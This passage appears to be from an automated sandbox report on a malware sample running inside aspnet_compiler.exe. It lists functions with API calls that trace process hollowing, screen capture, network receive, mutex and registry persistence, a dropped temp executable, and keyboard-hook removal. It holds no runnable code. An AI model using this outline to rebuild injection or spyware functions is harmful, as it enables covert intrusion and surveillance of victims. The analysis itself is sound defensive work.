                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                          • String ID:
                                                          • API String ID: 1084509184-0
                                                          • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                          • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                          • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                          • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                          Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0
                                                          • Opcode ID: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                          • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                          • Opcode Fuzzy Hash: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                          • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                          Function 004260F7 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: recv
                                                          • String ID:
                                                          • API String ID: 1507349165-0
                                                          • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                          • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                          • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                          • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                          Function 00433CD7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                          • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                          • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                          • Instruction Fuzzy Hash:
                                                          Function 0043CE3B Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BG3i@
                                                          • API String ID: 0-2407888476
                                                          • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                          • Instruction ID: a817909710d0090f483bb13cdd1d1ee80d6dfae79024daed79820ace932836b2
                                                          • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                          • Instruction Fuzzy Hash: E361777160070966DA385A2858D6BBF6396EB0DB04F10391BE943FF3C1D61DAD43874E
                                                          Function 0043CC0C Relevance: 1.5, Strings: 1, Instructions: 214COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                          • Instruction ID: e47b97b21f836cd03f295ee90de6feb37cae4df0254a032430ab3cefd666e269
                                                          • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                          • Instruction Fuzzy Hash: C851AC3160070457DF388A6985DA7BF6B959B0E700F18352FE48AFB382C60DED02979E
                                                          Function 00426E73 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                          • Instruction ID: 4dd25ef8aece06dcbd44762d080e1d81d96ea4c89eb3931c7e752ffea448aa68
                                                          • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                          • Instruction Fuzzy Hash: 99417576A083158FC314CE29D18021BFBE1FBC8300F568A2EF99693350D679E980CB86
                                                          Function 0044E92E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HeapProcess
                                                          • String ID:
                                                          • API String ID: 54951025-0
                                                          • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                          • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                          • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                          • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                          Function 0044C739 Relevance: .6, Instructions: 637COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                          • Instruction ID: 1fbb2d6a6e610910e1865e113166bba559d0ad1400e2c5ed2b94208389d41108
                                                          • Opcode Fuzzy Hash: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                          • Instruction Fuzzy Hash: 4E323621D2AF014DE7639634C862336A649AFB73C5F19D737F81AB5AA6EB2CC4C34105
                                                          Function 0041E5DF Relevance: .6, Instructions: 606COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f36ab663cb4d239ef1e0a5f108238eabc662f1d3d061ede5d5b4150ec9228ddd
                                                          • Instruction ID: 2a34495ee4f42e5442afe8381c33b9994a027dd0bc8bc0cc3fe6fc4803c66e78
                                                          • Opcode Fuzzy Hash: f36ab663cb4d239ef1e0a5f108238eabc662f1d3d061ede5d5b4150ec9228ddd
                                                          • Instruction Fuzzy Hash: 9732C1796087469BD714DF2AC4807ABB7E1BF84304F444A2EFC958B381D778DD858B8A
                                                          Function 004267CB Relevance: .4, Instructions: 437COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                          • Instruction ID: 022d1978040d43b7ea9bbfc0a41ffb8b00617051ae00cac38c3f572af68edcce
                                                          • Opcode Fuzzy Hash: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                          • Instruction Fuzzy Hash: 0D028F717046518FD318CF2EE880536B7E1AF8E301B46863EE585C7395EB74E922CB95
                                                          Function 00426254 Relevance: .4, Instructions: 377COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                          • Instruction ID: dd4ce2a6fae4266494c2f053a510589cf36d02151b1693af83bcfdcd1697f2cb
                                                          • Opcode Fuzzy Hash: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                          • Instruction Fuzzy Hash: 55F13B716142548FC314DF1DE89187BB3E0EB8A301B460A2EF5C2D7392DB78E91ADB56
                                                          Function 00431377 Relevance: .4, Instructions: 371COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7363a9fedaeb76f2bf31ad894624b0994c444190ff40f401d8ef5418a52334f3
                                                          • Instruction ID: a134442df30985c3d9ded0ed06b90328dea8838589cb671b1bd0994677c35241
                                                          • Opcode Fuzzy Hash: 7363a9fedaeb76f2bf31ad894624b0994c444190ff40f401d8ef5418a52334f3
                                                          • Instruction Fuzzy Hash: 60D1A171A083158BC721DE29C88096FB7E4FFD8354F446A2EF88597361EB38DD058B86
                                                          Function 0041D071 Relevance: .3, Instructions: 276COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
                                                          • Instruction ID: 86422b113df266cbb8d28aa4d41e6099a1760efb4c6ea83322c03ecd969c618c
                                                          • Opcode Fuzzy Hash: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
                                                          • Instruction Fuzzy Hash: 46B1817951429A8ACB05EF28C4913F63BA1EF6A300F4851B9EC9CCF757D3399506EB24
                                                          Function 0043D098 Relevance: .2, Instructions: 237COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                          • Instruction ID: 3f92c48b0efc6548e9d2ace3e3fdbc0fca8b075b553eb95927f683fa27391a83
                                                          • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                          • Instruction Fuzzy Hash: A4613471E0070867DE385928B896BBF23A8AB0D708F24755BE942DB381D65DDD43C24E
                                                          Function 0043C9DD Relevance: .2, Instructions: 214COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                          • Instruction ID: 61f6cd4e2a94a36a6652522188f48ed2bcd63c305fdb574287b7df62abf21a4e
                                                          • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                          • Instruction Fuzzy Hash: BB51677170460D9BDB34E96894E77BFA3899B0E344F18350BD882B7382D60CED02939E
                                                          Function 00426FAD Relevance: .2, Instructions: 186COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                          • Instruction ID: 42e819d74c2f676ea4fb49a2469d6a41ac5eaf2d1859dcf64078451750f97267
                                                          • Opcode Fuzzy Hash: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                          • Instruction Fuzzy Hash: 49614E32A083119FC308DF35E581A5BB7E5FFDC718F550E1EF48996151E674EA088B8A
                                                          Function 00437150 Relevance: .1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction ID: d77b428d8deff70f46db9a150fef47e19855adfe796a652afc1ecdf390514463
                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction Fuzzy Hash: D1110BF724C18143EE74862DD8B46B7A795EACE320F2C636BD0C14B758D52A99459908
                                                          Function 00417F9F Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 324windowmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                            • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                          • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                          • DeleteDC.GDI32(?), ref: 0041805D
                                                          • DeleteDC.GDI32(00000000), ref: 00418060
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                          • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                          • GetIconInfo.USER32(?,?), ref: 004180CB
                                                          • DeleteObject.GDI32(?), ref: 004180FA
                                                          • DeleteObject.GDI32(?), ref: 00418107
                                                          • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                          • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                          • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                          • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                          • DeleteDC.GDI32(?), ref: 0041827F
                                                          • DeleteDC.GDI32(00000000), ref: 00418282
                                                          • DeleteObject.GDI32(00000000), ref: 00418285
                                                          • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                          • DeleteObject.GDI32(00000000), ref: 00418344
                                                          • GlobalFree.KERNEL32(?), ref: 0041834B
                                                          • DeleteDC.GDI32(?), ref: 0041835B
                                                          • DeleteDC.GDI32(00000000), ref: 00418366
                                                          • DeleteDC.GDI32(?), ref: 00418398
                                                          • DeleteDC.GDI32(00000000), ref: 0041839B
                                                          • DeleteObject.GDI32(?), ref: 004183A1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                          • String ID: DISPLAY
                                                          • API String ID: 1765752176-865373369
                                                          • Opcode ID: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                          • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                          • Opcode Fuzzy Hash: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                          • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                          Function 00417245 Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 290libraryloaderthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                          • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                          • ResumeThread.KERNEL32(?), ref: 00417582
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                          • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                          • GetLastError.KERNEL32 ref: 004175C7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                                          • API String ID: 4188446516-108836778
                                                          • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                          • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                          • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                          • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                          Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                          • ExitProcess.KERNEL32 ref: 0041151D
                                                            • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                            • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                            • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                            • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                          • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                            • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                            • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                            • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                          • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                          • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                          • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                            • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                            • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                            • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                          • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                          • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                            • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                          • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                          • API String ID: 4250697656-2665858469
                                                          • Opcode ID: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                          • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                          • Opcode Fuzzy Hash: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                          • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                          Function 0040C28E Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                            • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                            • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                            • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                            • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                            • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                          • ExitProcess.KERNEL32 ref: 0040C63E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
